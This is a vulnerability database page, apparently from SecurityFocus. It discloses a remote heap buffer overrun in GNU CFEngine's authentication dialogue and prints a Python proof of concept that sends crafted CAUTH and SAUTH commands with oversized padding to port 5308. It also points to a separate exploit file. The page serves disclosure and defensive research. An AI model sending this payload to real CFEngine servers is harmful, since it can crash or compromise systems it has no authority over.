• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

GNU CFEngine AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability

An exploit was developed by the discoverers of this vulnerability. This exploit is not believed to be public. The following proof of concept is available:

import struct
import socket
import time

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.1',5308)

# CAUTH command
p = 'k' # status
p += '0000023' # len
p += 'CAUTH ' # command
p += 'HARE KRISHNA HARE'
print 'sending CAUTH command...'
s.send(p)
# SAUTH command
p = 'k' # status
p += '0003000' # len
p += 'SAUTH ' # command
p += 'n' # iscrypt
p += '00000010 ' # crypt_len
p += '00001000' # nonce_len
p += 'X' * 3000
print 'sending SAUTH command...'
s.send(p)

a = s.recv(4096)
print a

Exploit code cfengine_hof.c has been supplied by jsk exworm <exworm.hostrocket.com>.

• /data/vulnerabilities/exploits/cfengine_hof.c